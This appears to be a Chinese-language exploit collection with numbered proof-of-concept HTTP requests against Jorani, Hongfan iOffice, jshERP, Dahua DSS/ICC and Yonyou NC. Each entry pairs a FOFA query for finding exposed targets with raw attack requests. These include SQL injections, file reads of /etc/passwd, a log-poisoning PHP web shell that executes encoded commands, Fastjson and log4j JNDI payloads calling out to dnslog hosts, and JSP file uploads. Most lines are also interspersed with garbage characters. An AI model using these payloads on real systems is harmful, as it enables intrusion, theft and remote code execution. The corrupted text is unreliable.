* S1 Z5 r2 J2 @$ L7 p/ t" eGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.16 s5 u! f. B% Z4 S7 K) w. R$ A
Host: 127.0.0.11 ]0 g0 Y2 Y. J- o z4 X7 A
Pragma: no-cache
( w7 X6 o+ W) R" ]: Q7 ECache-Control: no-cache
- p/ U2 }- G% g, Q1 R1 x: L9 f6 u5 _Upgrade-Insecure-Requests: 1
$ y* v! }- j) m9 `# W* |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ o) b, n/ b1 O( c) dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; y% v2 p1 ~3 J X9 n
Accept-Encoding: gzip, deflate
/ B1 C* F1 p' y IAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
* f- P }, z0 hConnection: close. Y, E+ I" I/ H6 U; R. H4 _' z. x
4 ^7 }4 p: X; {5 l. X4 Q
( L7 e. o# y% ]' E; M
12. Jorani < 1.0.2 远程命令执行
8 o' g% | V1 |4 sFOFA:title="Jorani"- i% y; _: N! W' E" a& _7 o
第一步先拿到cookie
, z, O$ |% G8 N0 K; lGET /session/login HTTP/1.1' p) F! w- w! \8 Y! H
Host: 192.168.190.30) X3 L# v; A- v7 o
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36! o$ {& O( i8 `# q/ r
Connection: close1 e: z* m' {; |# V l3 D! p
Accept-Encoding: gzip, Z5 k( Z% T+ u' O
6 W6 [9 ?2 ?8 K; B Y7 S! a: l" w2 b( n1 s
响应中csrf_cookie_jorani用于后续请求
3 g0 t# [# |# e: ZHTTP/1.1 200 OK5 }# @% v, x0 g$ K5 c! M1 L, X) S
Connection: close+ R4 w5 ~) \# w6 R4 h- a
Cache-Control: no-store, no-cache, must-revalidate) c6 O3 j+ _5 s$ H; n
Content-Type: text/html; charset=UTF-8
4 _ n; [/ g# { i! y: f h# r$ z; sDate: Tue, 24 Oct 2023 09:34:28 GMT* J+ O z7 E P% J% F& ?
Expires: Thu, 19 Nov 1981 08:52:00 GMT
8 Z6 P" t' C$ s1 ^7 M7 Z3 GLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
. q. q. N' P* d$ k2 B/ X6 R7 sPragma: no-cache. l7 o q" c% x/ K2 {
Server: Apache/2.4.54 (Debian)3 ]% j1 W* M7 l! {$ o5 Y
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/3 O7 G* o+ W! d/ |
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly' p9 t1 e2 t) J
Vary: Accept-Encoding
( U& Z* s+ k& U h1 P# a- X% ^3 Y- N- X8 ?/ J4 z8 z
1 n) n; T6 @; A% t# p! u
POST请求,执行函数并进行base64编码6 ^: o" u0 [2 r; j6 v5 f% h3 R
POST /session/login HTTP/1.1
' I4 |! @3 ]+ j* k1 l1 v- _6 LHost: 192.168.190.301 A( U- Q9 |% T- ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% D/ h8 n7 ?3 S+ X
Connection: close
' [! d9 k- V: TContent-Length: 252( h7 ^$ W4 ]; n1 ~0 r) _, C V
Content-Type: application/x-www-form-urlencoded
4 K8 U0 b8 u( B+ fCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r" [4 B3 L2 _' A6 u; C
Accept-Encoding: gzip
" D5 I- ~# p' `3 n( i$ s
3 \: c6 O1 F% c' h7 w1 _& dcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor/ W" C, E+ z) a* J$ X/ G
6 @8 ^ m. X, F% [+ t) [: Z B4 o# n( V" S, V
% I+ c% j/ ~9 x" h
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串7 V' P. e3 D% W# ]6 z) J
GET /pages/view/log-2023-10-24 HTTP/1.1
9 Q' R x$ d; i- T2 iHost: 192.168.190.30
4 O3 E% {2 e1 g; E* s0 @7 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 s6 j8 X/ O2 e; x& R F
Connection: close
8 Z1 N/ L( Y3 XCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r' ~. M2 c. o0 F- ]1 f
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
! _7 X; ^# N! x- X$ MX-REQUESTED-WITH: XMLHttpRequest# Z4 _# C+ ~2 j* N% U6 M
Accept-Encoding: gzip
5 Q* l% @+ A0 r, U( \
' [1 ~5 D' A4 b1 v7 I+ L4 C+ B/ n" ^2 q8 K; O# Q2 d( h5 P" g: N. B2 s
13. 红帆iOffice ioFileDown任意文件读取0 l" T( _6 i& v
FOFA:app="红帆-ioffice"
6 T( Z8 k6 j' U: o2 u% u. b$ y$ SGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1% D4 _) U8 O& `
Host: x.x.x.x# n: _/ b$ H9 D8 r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ }8 F8 h1 _2 W, p0 i- P
Connection: close; D$ ~1 W4 W* s1 b# T/ V3 @; g* [
Accept: */*
) U' q; ^+ C U- R7 XAccept-Encoding: gzip' o2 o' F) [. i7 D$ [, K9 J
! w$ @1 `( ]; _ l; i# R
9 k" ^- u- Z" b1 g2 G. s' |0 W
14. 华夏ERP(jshERP)敏感信息泄露
) l' e7 |7 _+ o1 B6 HFOFA:body="jshERP-boot"
# Q0 E$ r9 R4 J1 a( W泄露内容包括用户名密码 o. H- J: m+ Y2 `0 Z
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
+ j3 J( |$ p6 o& WHost: x.x.x.x
+ G, \% k8 a3 y, r" M$ g9 F) I0 W- RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
, _8 M$ d8 {* v6 JConnection: close9 a3 Z7 i$ ~' V: w$ h
Accept: */*
7 q$ m+ s) E& z5 FAccept-Language: en& ]/ R% ?+ n2 f, i9 w$ n! J
Accept-Encoding: gzip3 g9 J( O6 u9 ?5 k |6 p$ O
/ Y/ f# y% U+ y' z3 J) R6 u- |) K6 I9 A9 ~ J' V
15. 华夏ERP getAllList信息泄露. \, R! L% I" S' N" O" h. j. I
CVE-2024-04903 M9 a9 N% ^3 V& Z! h
FOFA:body="jshERP-boot"
9 ^. l. d% T+ \$ b+ ?' h泄露内容包括用户名密码5 y2 A2 } p K( ~
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
- t1 `7 K& P; J- yHost: 192.168.40.130:1005 D, c' V( `& c2 v. W/ E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" P1 \3 U7 O5 R9 {/ JConnection: close
! |. i$ F7 B3 \, t% k7 mAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) A; f0 t$ q) h z5 D' S, P- n: }Accept-Language: en
6 t" `4 T% z4 ~, M( ssec-ch-ua-platform: Windows' ]6 p" l. U: k- ^
Accept-Encoding: gzip
, |2 `& ] [- P% ^) K3 u+ Q* R; M% b }0 U& Y S7 U0 |
. V7 M( d- L/ [* a4 U16. 红帆HFOffice医微云SQL注入
, P: J- k( F$ k1 k6 Q) O6 b( }FOFA:title="HFOffice"
/ v* q0 }) P/ J3 `' Cpoc中调用函数计算1234的md5值4 X0 _5 e& g9 u, ^# [: p
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1# Q3 K }1 y; h5 Y6 |' }
Host: x.x.x.x
( K8 s+ V- E, @& a' ]0 z* k1 lUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 v- G4 t& I# z8 |, F
Connection: close
8 ~4 L8 ~* {6 W! TAccept: */*
' b! k, j6 B3 B; F' [Accept-Language: en c2 Q9 C$ w. M1 ?2 I& b6 f3 H
Accept-Encoding: gzip
% l4 e0 Z& X0 w4 S0 T4 F% a# T8 O- }1 {7 u$ S/ u
* N( v$ ]0 [* J: e17. 大华 DSS itcBulletin SQL 注入
" g. E+ Q. |( t# L7 ]' FFOFA:app="dahua-DSS"
( B" c2 q7 v( d8 CPOST /portal/services/itcBulletin?wsdl HTTP/1.1& y: ~3 p; J# G; n' H; I9 w
Host: x.x.x.x! L2 C, G" X: U# C7 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 P+ s, F. x w/ F- }! L
Connection: close* }- C6 i" O8 I
Content-Length: 345
9 w1 f2 H# w1 \% d0 DAccept-Encoding: gzip( A) ^- E* y8 h: _) \; h+ a/ C1 k
+ n$ U; k$ L3 h( ]* x; m& i6 | h
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>4 F5 r1 E. F1 R3 f5 P
<s11:Body>
( q8 _8 B: |, k0 T, ^5 D& a <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
( c# O+ |) y7 c& R+ P+ F% q <netMarkings>' V" P# n1 f, Z& m* W
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
Y+ ]: G j) q% y </netMarkings>6 z x. n- ]0 Q8 [( x7 ~( O
</ns1:deleteBulletin>
% b, S# }! g4 t( D </s11:Body>
# [$ O, Y9 R/ \1 @5 Z: h1 n</s11:Envelope>
' s$ ?/ q Y. o2 G, f' c5 g6 W' d4 d
5 q( A8 M- Y, i3 R
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 y+ T+ u) N/ h1 iFOFA:app="dahua-DSS"& T, A9 o* ^! _' X3 w
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* ?6 c/ {( k& ~6 v0 B8 m$ rHost: your-ip5 \( R: U* K& F! A2 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 h% c0 N6 `- e$ t# h
Accept-Encoding: gzip, deflate
/ s8 t/ u# }4 q. C/ X6 v" J- F lAccept: */*4 @7 @8 o9 G# `' A1 w8 Y& \0 }% H
Connection: keep-alive
; i# j4 x3 p" L2 }+ H; H5 I1 W% K6 Y
0 p5 p8 R! W8 P6 x9 i# Y0 o5 O
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
, [8 N3 o; o7 F' P" U; kFOFA:app="dahua-DSS"' O I, Z1 \. g
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
2 s6 H. r8 C7 s! l2 G2 C; P4 L5 EHost:* R+ M$ ^1 x1 I3 B# C1 w( N
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ r) M2 D7 S: P" j
Accept-Encoding: gzip, deflate
; x; B0 r" S' F+ ~1 T9 zAccept: */*5 k7 _' R& x' b
Connection: keep-alive, h# q9 u/ ~8 p1 w3 D7 Q: c
: q5 L, u' S* U( g6 _8 Y1 }
. I4 w6 u% W6 p1 f20. 大华ICC智能物联综合管理平台任意文件读取
6 p3 a5 Z4 z; m8 {' J/ ]FOFA:body="*客户端会小于800*"
% ^0 t) u, l5 v: P7 R- P! AGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.15 A: e p2 ~' z
Host: x.x.x.x
+ x. z) A% {% @& {User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) |7 M% N, @4 [" O, QConnection: close" |4 Y; x1 O# I, T& l
Accept: */*
; |2 m& |4 P! K. Q! j6 R( [Accept-Language: en( z3 T L4 N( J: u+ U- t4 ^
Accept-Encoding: gzip
! {" Q8 x5 k* T' H, C5 ^* w9 X6 n2 _5 E& ]
# f4 Q( U! s7 v
21. 大华ICC智能物联综合管理平台random远程代码执行
! c' x6 u4 @$ h" IFOFA:icon_hash="-1935899595"
% @: x2 B; v$ @" O FPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
) y7 P6 t" _8 W# C; g( uHost: x.x.x.x
/ v2 d3 C# q; qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 z2 D+ W9 U8 T6 n$ }9 aContent-Length: 161* o3 \2 f& [" Q. O+ b( C. t; b
Accept-Encoding: gzip+ O; r7 k$ y% f8 F4 k" U5 f
Connection: close5 V" m- a& Q7 U% Y
Content-Type: application/json;charset=utf-8
6 d5 b7 M% A1 k g, V6 T, C, }1 M' t7 y6 G+ s3 b% E, Q( k
{
5 u, ^% I) \# q& i$ e# j"a":{
. M7 w5 b$ P4 W! x3 N" U "@type":"com.alibaba.fastjson.JSONObject",$ K/ N: }! Q \
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}$ I* S. G' L* I+ x
}""1 g2 ]3 x' r/ `3 A9 `7 Y/ X5 i
}
. h q5 C7 ]; D* ~9 c3 d2 I- P8 Z0 y$ o4 b. _ R
! V- R5 H; }( y" ~+ W22. 大华ICC智能物联综合管理平台 log4j远程代码执行% f4 ~2 G( W2 H9 W1 S2 O4 F
FOFA:icon_hash="-1935899595"
# V- |/ |- [- k* jPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
* z4 R! D% _) ~: c: W9 r1 JHost: your-ip
" Z' k( u8 p9 X" {3 R( m# OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 ~, s3 n6 l; c3 r
Content-Type: application/json;charset=utf-8
2 {+ A& ]3 \9 i1 b) s6 t: j2 \) i! `3 G$ t" G
{
/ ~1 C z) e1 W, N( X"loginName":"${jndi:ldap://dnslog}"5 N8 x+ u% s1 F7 c6 e
}
2 O7 J4 x2 n3 [& X3 f7 k! k- _7 o- \8 [4 x/ d3 T4 I; ?. l
* I ~% w3 W$ |
6 p9 r8 X: K- S; w, p& u% c23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
$ z' N, v6 Z+ z' e( mFOFA:icon_hash="-1935899595"
, z: ~* o; }! \7 _+ ZPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.14 Q6 X/ t: s! ]: i' M
Host: your-ip1 v- R6 O/ z: c% i0 y; i2 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* ]$ G4 u1 ` |5 s! f3 l
Content-Type: application/json;charset=utf-8
4 g% i; M* ]. @! EAccept-Encoding: gzip
$ b: I0 A6 `2 h) \& m6 DConnection: close! [ z- @+ M9 W. e1 N+ c4 C% G! _
7 L4 d/ I2 q, D& Z1 r& a% \1 E{
% I+ B, F8 p/ j' x! ]. ` "a":{- `+ _6 X }) W' Z3 }( N/ W
"@type":"com.alibaba.fastjson.JSONObject",
' V: }) l5 [) Z& E& ]" H {"@type":"java.net.URL","val":"http://DNSLOG"}
) n5 y8 K Q3 ]! D _8 s. T }""/ G8 t0 i9 [: I: L
}
9 d$ i) l3 H- X5 f3 }) J- c" ?& c$ M& Z' u# M D5 G
* P" M" G" w. u8 ^2 k _( r
24. 用友NC 6.5 accept.jsp任意文件上传
3 n/ d* P. m, n6 d/ xFOFA:icon_hash="1085941792"
9 r0 _9 x! ?6 X4 \# i/ TPOST /aim/equipmap/accept.jsp HTTP/1.1
2 N' Z/ D$ v) f' E* i+ u, U5 vHost: x.x.x.x
8 t) e3 O! J$ O9 EUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) r7 v8 ^. x5 \/ x2 EConnection: close( L8 e4 `" z- H0 W# ?
Content-Length: 4492 x. F0 z: J3 ?# V3 Z0 i
Accept: */*
0 Y2 r6 f2 c6 v; M( Y. E- gAccept-Encoding: gzip
% R9 [) n8 e$ L* @3 d$ \& h* FContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
i$ |5 Q% E% A6 U$ c/ T! q3 @8 i* D7 o( `. G( [) u
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ K+ q" v* e2 w5 c5 | B& o& hContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
( x" Y$ ]2 @; NContent-Type: text/plain
3 O( N/ ~3 @- S; Y( ^) \/ ^8 W I
; }1 W- L0 n2 S; `7 h<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>* b. \1 s% Y4 v0 J) c5 L) m
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
& B$ D, i/ ^6 D5 ZContent-Disposition: form-data; name="fname"
4 z/ l- ~8 \8 |8 i
" |! x# C# R" D\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp; S' C, i* n n4 I7 `% ~
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--3 u% a$ B( B/ q
3 ^ i7 w6 w) u- Z( i
8 Z# c/ ~, S2 O, m2 q
25. 用友NC registerServlet JNDI 远程代码执行
# y) }0 y* M9 G) k2 iFOFA:app="用友-UFIDA-NC"4 K6 Y- p1 ?* u( g
POST /portal/registerServlet HTTP/1.1, b1 H) U; v$ y+ q- U; e
Host: your-ip& _. ?+ d' I `) }* r9 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
3 h ^5 d. y# ~" ?0 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
( i& z A* H! W: I P' A. n( ~Accept-Encoding: gzip, deflate+ H6 d6 ?9 A' ] l. I
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
' U% J$ J+ k, _Content-Type: application/x-www-form-urlencoded
+ g9 m+ A+ O1 l# p" K+ z" g" [$ y. O2 R3 S
type=1&dsname=ldap://dnslog, D, d0 _: m c6 F3 u
: c2 c; s. S) q% s! V
& l: d2 y4 O. R( y" c% P, u
1 a& e# S* I- [; O V26. 用友NC linkVoucher SQL注入2 I, b: V2 Q; w9 T# [
FOFA:app="用友-UFIDA-NC"
0 z( M3 Q. m- A m0 P8 E* vGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% v: S' x& i- s3 BHost: your-ip
! q# l- M) |; D& [3 \3 w/ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 Q4 m( r3 h+ v; k- M7 h
Content-Type: application/x-www-form-urlencoded x, Y; P9 h. C
Accept-Encoding: gzip, deflate$ L8 h- s& Z1 T* V; I
Accept: */*
, C! N' t, u7 n# ~Connection: keep-alive4 J3 `: p3 y" F2 S' t5 k
: ?7 c6 R' d+ O; R: p# F$ M0 a: R5 z' S! F# z& J0 M2 l
27. 用友 NC showcontent SQL注入
4 @* v* ^0 q3 i r) G$ ^' bFOFA:icon_hash="1085941792"6 b. Z; c, {) ?- r) c5 S
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
~6 }' t. w6 u5 }6 t/ N7 UHost: your-ip
. S9 C" i* ]4 ~! SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 |1 m8 H8 d, G D* n9 `8 Q lAccept-Encoding: identity: i( `( e; Y: F; o. u l
Connection: close
4 W7 n4 y1 k; K; k! EContent-Type: text/xml; charset=utf-8# [5 B" V* @* D* {7 s5 n
4 ^) e9 o6 h) I4 [7 Q: E
: k0 q5 p6 c( A
28. 用友NC grouptemplet 任意文件上传
2 g1 @; R* V+ I/ g. `; ]6 eFOFA:icon_hash="1085941792"
1 f/ i `, ?1 v* m! M0 `1 tPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
6 O. u) |. S& U' WHost: x.x.x.x
, ]5 ~0 {! K4 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
# N$ S% X) _; p* l* K- j3 JConnection: close
: y, y5 q3 ^4 e; C B% u& lContent-Length: 268/ W( T5 Y! z# A5 o! m
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
+ @1 p0 l& _. iAccept-Encoding: gzip% |; \. e8 k o- U4 x& W8 {
" w- n7 ~7 t& I% z! _% V------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 B6 U: E9 W0 F
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp": e3 ?) t. w7 b+ Q- \
Content-Type: application/octet-stream
$ [2 p' J& k7 D9 H+ j; T# e* \, v) B! v" r3 n
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
^0 F# v, K# A% W) A------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
. Z1 [6 N& e9 r! x' m2 {
$ \( W( f8 w2 P7 [0 O# [# ~; Z+ m1 @7 h3 A; D! y* t1 q ~
/uapim/static/pages/nc/head.jsp
( x5 ]1 W/ {, |
+ _( e3 H# x9 w, |: w29. 用友NC down/bill SQL注入4 O& J" ~5 @; T' V* f3 r
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 e2 l5 J j8 P2 F# F k8 S+ W9 `) q
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
3 Z6 K, d; r% @+ K% P% c$ }Host: your-ip
4 d! K5 v! M0 X+ g% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) x/ J2 G" W! ^* }
Content-Type: application/x-www-form-urlencoded, R) H6 s, V! f: ]3 u! D
Accept-Encoding: gzip, deflate1 e% D: ]* _- B9 }5 ?
Accept: */*7 i" }2 M: Q3 |* R% g
Connection: keep-alive
- t! y2 `; D4 v7 J8 S& t
& Y2 ]& L& L( C6 \6 e. H: T! ]* F2 a0 O3 x0 b+ V6 m# q1 D1 G
30. 用友NC importPml SQL注入* U) O- u" U" T; k: p. [
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! W2 I; f; u5 G0 b# Y7 K }POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1/ t$ G( A4 l( U- H0 c; o0 z+ P% ~8 Q# O
Host: your-ip
' |7 p4 y1 U9 {' i# pContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( I1 n0 M, u; iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 H0 W* W, S# G5 u8 _2 f1 rConnection: close2 p* G9 s# R$ g5 B0 W
" Q4 ~9 V- |' Q0 K3 i1 Q
------WebKitFormBoundaryH970hbttBhoCyj9V
6 J* C4 Y5 y' J) G1 C4 u. `Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
* D: P* J8 h- j+ LContent-Type: image/jpeg
( u& K/ r5 N8 ?' W* W------WebKitFormBoundaryH970hbttBhoCyj9V--
' {9 I( K7 g) @. K6 w. G% d W* r% @# Q9 Y, V: e
! j3 P; a; W* i% H/ W6 `$ x h31. 用友NC runStateServlet SQL注入
5 t7 v/ I7 S \; \6 c2 i+ iversion<=6.5
& V( q5 \/ V R u' dFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"( f! K3 @, L9 N6 l# @: _# I* m
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1. G1 n' z u" y' l5 x, ]7 a' ]
Host: host
. @% }1 U* Y7 [/ u1 l/ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ h' D$ q: j; F0 G! t( T( s! PContent-Type: application/x-www-form-urlencoded0 B& }! i9 Z9 k- \9 n
# [* F- P d- K+ j, q! X3 M. [9 P: a; e5 S; v
32. 用友NC complainbilldetail SQL注入1 _" z5 }/ @ v7 P1 J6 Q5 d7 I" k* {
version= NC633、NC65
9 K5 [9 {/ L6 [9 O% u% c# BFOFA:app="用友-UFIDA-NC": u2 ~! S- b7 i; i/ x0 i
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- m- Y: ?2 c# A& w' p2 |Host: your-ip
1 U; [/ b: N: v6 v9 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& }: }! o: s4 r8 m5 ?Content-Type: application/x-www-form-urlencoded( a; r" q& C% R
Accept-Encoding: gzip, deflate( o6 m$ l2 d( [# g- k9 ]9 B
Accept: */*
' ^, Y! ^. B# c8 i/ bConnection: keep-alive
: M$ x6 |+ ^0 U% a* S K& V
9 B" _" u9 c4 ~5 A( N
$ N0 L! J$ g2 \% J7 l+ @33. 用友NC downTax/download SQL注入7 b) @3 |- X% B% W0 s/ @+ Q0 U
version:NC6.5FOFA:app="用友-UFIDA-NC"; h! k: ^/ `* D4 K
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' d2 M' c) u5 H9 X* X- rHost: your-ip- d8 O6 x3 x9 S/ b" @/ _) w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 K( c7 ^* ]/ {1 s0 i, HContent-Type: application/x-www-form-urlencoded7 R( K% C$ ~9 y; _+ i& d5 D1 \7 K4 A7 j
Accept-Encoding: gzip, deflate+ J; A+ \; m& ~
Accept: */*
* q: P0 G# B2 p" {) G" }+ X2 |Connection: keep-alive. {7 n$ l& R7 R b2 U
* }2 l J/ s, S9 g
: H: w" R% \2 W34. 用友NC warningDetailInfo接口SQL注入( r0 ]' @* P" e( V/ A. T
FOFA:app="用友-UFIDA-NC"5 t9 L* _& e/ f
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1: z+ u0 Q' g6 ]2 A1 k# k! g5 C
Host: your-ip
, L1 q& T0 P3 I2 A- c7 ? G( Q) }! JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 B1 w& l3 H3 E' b+ I( C0 b
Content-Type: application/x-www-form-urlencoded# c" n. ?6 z g5 I6 y/ [
Accept-Encoding: gzip, deflate/ ~9 a$ W2 b" o4 p* B: K
Accept: */*
) @# `7 s( Z. I% N; dConnection: keep-alive: v- N" {+ q' |& Y3 Y
[# \2 Q" h+ j! K" m. c
% I S' D6 [- F5 F6 m3 I
35. 用友NC-Cloud importhttpscer任意文件上传% A" T- Z4 m, a6 t
FOFA:app="用友-NC-Cloud"
